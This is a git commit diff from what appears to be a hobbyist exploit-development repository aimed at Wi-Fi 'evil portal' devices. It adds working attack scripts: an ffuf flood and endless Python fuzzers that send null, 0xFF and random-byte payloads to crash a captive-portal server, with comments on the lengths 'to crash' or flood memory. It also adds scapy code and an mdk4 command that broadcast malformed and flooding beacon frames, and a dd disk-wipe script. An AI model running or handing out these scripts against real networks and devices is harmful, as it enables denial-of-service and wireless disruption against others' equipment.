added stuff with scapy and mdk4 for wifi beacon exploit dev
This commit is contained in:
@@ -0,0 +1,23 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
wifi_device=wlan1
|
||||||
|
ssid=Guest-WiFi
|
||||||
|
host="192.168.4.1"
|
||||||
|
|
||||||
|
wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt
|
||||||
|
|
||||||
|
sudo nmcli d disconnect $wifi_device > /dev/null
|
||||||
|
|
||||||
|
sudo nmcli dev wifi rescan > /dev/null
|
||||||
|
|
||||||
|
echo -e "\nCashing This Evil Portal With No Survivors\n"
|
||||||
|
|
||||||
|
sudo nmcli device wifi connect $ssid ifname $wifi_device
|
||||||
|
|
||||||
|
echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n"
|
||||||
|
|
||||||
|
ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3
|
||||||
|
|
||||||
|
echo -e "\n\nPinging To Confirm Kill...\n"
|
||||||
|
ping -c 4 $host
|
||||||
|
|
||||||
|
echo -e "\nThat Was Big Payload (4U)\nRIP"
|
||||||
@@ -0,0 +1,3 @@
|
|||||||
|
|
||||||
|
|
||||||
|
0/10000 - Char: X - Prepend: - Append:
|
||||||
@@ -0,0 +1,3 @@
|
|||||||
|
|
||||||
|
|
||||||
|
0/10000 - Char: X - Prepend: - Append:
|
||||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,3 @@
|
|||||||
|
|
||||||
|
|
||||||
|
0/10000 - Char: %00%FF - Prepend: - Append:
|
||||||
@@ -0,0 +1,3 @@
|
|||||||
|
|
||||||
|
|
||||||
|
0/10000 - Char: %00%FF - Prepend: - Append:
|
||||||
File diff suppressed because it is too large
Load Diff
@@ -2,10 +2,11 @@ import datetime
|
|||||||
import subprocess
|
import subprocess
|
||||||
import time
|
import time
|
||||||
|
|
||||||
host = "http://10.0.0.80"
|
# host = "http://10.0.0.80"
|
||||||
# host = "http://192.168.4.1"
|
# host = "http://192.168.4.1"
|
||||||
charlen = 1489
|
host = "http://172.0.0.1"
|
||||||
char = "%00"
|
charlen = 750
|
||||||
|
char = "%00%FF"
|
||||||
prepend = ""
|
prepend = ""
|
||||||
append = ""
|
append = ""
|
||||||
|
|
||||||
|
|||||||
@@ -3,9 +3,10 @@ import subprocess
|
|||||||
import time
|
import time
|
||||||
|
|
||||||
# host = "http://10.0.0.80"
|
# host = "http://10.0.0.80"
|
||||||
host = "http://192.168.4.1"
|
# host = "http://192.168.4.1"
|
||||||
|
host = "http://172.0.0.1"
|
||||||
rangei = 10000
|
rangei = 10000
|
||||||
char = "X"
|
char = "%00%FF"
|
||||||
# char = "%00"
|
# char = "%00"
|
||||||
prepend = ""
|
prepend = ""
|
||||||
append = ""
|
append = ""
|
||||||
@@ -35,7 +36,7 @@ for x in range(rangei+1):
|
|||||||
payload = f"{prepend}{chars}{append}"
|
payload = f"{prepend}{chars}{append}"
|
||||||
uri = f"{host}/get?email={payload}&password={payload}"
|
uri = f"{host}/get?email={payload}&password={payload}"
|
||||||
command = f"{curl_cmd} '{uri}' >> {outfile}"
|
command = f"{curl_cmd} '{uri}' >> {outfile}"
|
||||||
print(f"Running {x}/{rangei} chars ({char})\n\tPrepend: {prepend}\n\tAppend: {append}\n\Outfile: {outfile}\n")
|
print(f"Running {x}/{rangei} chars ({char})\n\tPrepend: {prepend}\n\tAppend: {append}\nOutfile: {outfile}\n")
|
||||||
with open(outfile, "a") as log:
|
with open(outfile, "a") as log:
|
||||||
log.write(f"\n\n{x}/{rangei} - Char: {char} - Prepend: {prepend} - Append: {append}\n")
|
log.write(f"\n\n{x}/{rangei} - Char: {char} - Prepend: {prepend} - Append: {append}\n")
|
||||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||||
|
|||||||
@@ -0,0 +1 @@
|
|||||||
|
bash connect-wifi && python sd-card-murder.py
|
||||||
@@ -4,21 +4,26 @@ import os
|
|||||||
import urllib.parse
|
import urllib.parse
|
||||||
from random import randbytes
|
from random import randbytes
|
||||||
|
|
||||||
host = "http://192.168.4.1"
|
# host = "http://192.168.4.1" # cyd version
|
||||||
|
host = "http://172.0.0.1" # flipper version
|
||||||
# host = "http://10.0.0.80"
|
# host = "http://10.0.0.80"
|
||||||
rangei = 10000
|
# rangei = 10000
|
||||||
# charlen = 4*400
|
# charlen = 2012 # to crash
|
||||||
charlen = 128
|
charlen = 1400 # to flood flipper mem(?)
|
||||||
|
# charlen = 700 # to flood filesysted
|
||||||
curl_cmd = "curl --include --silent --show-error"
|
curl_cmd = "curl --include --silent --show-error"
|
||||||
|
|
||||||
for x in range(rangei+1):
|
x = 0
|
||||||
|
#for x in range(rangei+1):
|
||||||
|
while True:
|
||||||
payload = urllib.parse.quote(randbytes(charlen))
|
payload = urllib.parse.quote(randbytes(charlen))
|
||||||
uri = f"{host}/get?email={payload}&password={payload}"
|
uri = f"{host}/get?email={payload}&password={payload}"
|
||||||
command = f"{curl_cmd} '{uri}'"
|
command = f"{curl_cmd} '{uri}'"
|
||||||
|
|
||||||
print(f"{x} of {rangei} sets of {charlen} random bytes")
|
print(f"{x} of infinite sets of {charlen} random bytes")
|
||||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||||
(output, err) = p.communicate()
|
(output, err) = p.communicate()
|
||||||
p_status = p.wait()
|
p_status = p.wait()
|
||||||
|
x=x+1
|
||||||
|
|
||||||
print(f"\n\nThe End")
|
print(f"\n\nThe End")
|
||||||
|
|||||||
@@ -0,0 +1,25 @@
|
|||||||
|
from scapy.all import *
|
||||||
|
|
||||||
|
iface = 'wlan1'
|
||||||
|
sender = 'ac:cb:12:ad:58:27'
|
||||||
|
|
||||||
|
def beacon_raw(SSID, length=255):
|
||||||
|
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender)
|
||||||
|
beacon = Dot11Beacon()
|
||||||
|
essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=length)
|
||||||
|
frame = RadioTap()/dot11/beacon/essid
|
||||||
|
sendp(frame, iface=iface, inter=0.250, loop=1)
|
||||||
|
# sendp(frame, iface=iface, inter=0.100, count=256)
|
||||||
|
|
||||||
|
def beacon_normie(SSID):
|
||||||
|
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender)
|
||||||
|
beacon = Dot11Beacon()
|
||||||
|
essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID))
|
||||||
|
frame = RadioTap()/dot11/beacon/essid
|
||||||
|
sendp(frame, iface=iface, inter=0.250, loop=1)
|
||||||
|
# sendp(frame, iface=iface, inter=0.100, count=256)
|
||||||
|
|
||||||
|
longgg = "\xFF"*800
|
||||||
|
longggg = f"\x00{longgg}\x00"
|
||||||
|
#beacon_raw(longggg)
|
||||||
|
beacon_normie(b"\xFF\x00\xFF\x00\xFF\x00\xFF\x00\xFF\x00")
|
||||||
@@ -1 +1,6 @@
|
|||||||
sudo mount /dev/`echo $1`1 /mnt/MARAUDLABEL
|
lsblk
|
||||||
|
echo -e "\nSelect A Disk (sda1, sdb1, etc)"
|
||||||
|
read disk
|
||||||
|
sudo mount /dev/$disk /mnt/MARAUDLABEL
|
||||||
|
echo -e "\n/mnt/MARAUDLABEL\n"
|
||||||
|
ls -lah /mnt/MARAUDLABEL
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
mountpoint=/mnt/MARAUDLABEL/
|
mountpoint=/mnt/MARAUDLABEL/
|
||||||
gb_to_zero=4
|
gb_to_zero=1
|
||||||
# full_wipe=True
|
full_wipe=True
|
||||||
copy_files=True
|
copy_files=True
|
||||||
|
|
||||||
echo "WILL WIPE DISK USE WITH CARE"
|
echo "WILL WIPE DISK USE WITH CARE"
|
||||||
@@ -11,6 +11,7 @@ lsblk
|
|||||||
echo -e "\nEnter disk (e.x. sda or sdb - BE CAREFUL)"
|
echo -e "\nEnter disk (e.x. sda or sdb - BE CAREFUL)"
|
||||||
read disk
|
read disk
|
||||||
block="/dev/${disk}"
|
block="/dev/${disk}"
|
||||||
|
|
||||||
if [ -z $full_wipe ]; then
|
if [ -z $full_wipe ]; then
|
||||||
echo -e "\nZeroing ${gb_to_zero}GB on Disk $block"
|
echo -e "\nZeroing ${gb_to_zero}GB on Disk $block"
|
||||||
sudo dd if=/dev/zero of=$block status=progress bs=1M count="${gb_to_zero}K" conv=fdatasync
|
sudo dd if=/dev/zero of=$block status=progress bs=1M count="${gb_to_zero}K" conv=fdatasync
|
||||||
|
|||||||
@@ -350,3 +350,20 @@ filename="/home/kali/marauderexploitdev/imgs/${number}-${tag}-${dumpsize}-${time
|
|||||||
echo "sudo dd if=$block of=$filename bs=$blocksize count=$blocks status=progress conv=fdatasync"
|
echo "sudo dd if=$block of=$filename bs=$blocksize count=$blocks status=progress conv=fdatasync"
|
||||||
|
|
||||||
ffuf -input-cmd 'dd bs=1 count=1K if=/dev/urandom' -u "http://10.0.0.80/get.php?email=FUZZ&password=FUZZ" -input-num 2000 -mc all -timeout 3 -v -ignore-body -sa -t 256 -rate 10
|
ffuf -input-cmd 'dd bs=1 count=1K if=/dev/urandom' -u "http://10.0.0.80/get.php?email=FUZZ&password=FUZZ" -input-num 2000 -mc all -timeout 3 -v -ignore-body -sa -t 256 -rate 10
|
||||||
|
|
||||||
|
|
||||||
|
# beacons
|
||||||
|
sudo mdk4 wlan1 b -a -w tawn -c 1 -s 50
|
||||||
|
scapy:
|
||||||
|
|
||||||
|
SSID = b"Test\x00SSID"
|
||||||
|
iface = 'wlan1'
|
||||||
|
sender = 'ac:cb:12:ad:58:27'
|
||||||
|
|
||||||
|
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender)
|
||||||
|
beacon = Dot11Beacon()
|
||||||
|
essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID))
|
||||||
|
|
||||||
|
frame = RadioTap()/dot11/beacon/essid
|
||||||
|
|
||||||
|
sendp(frame, iface=iface, inter=0.100, loop=1)
|
||||||
Reference in New Issue
Block a user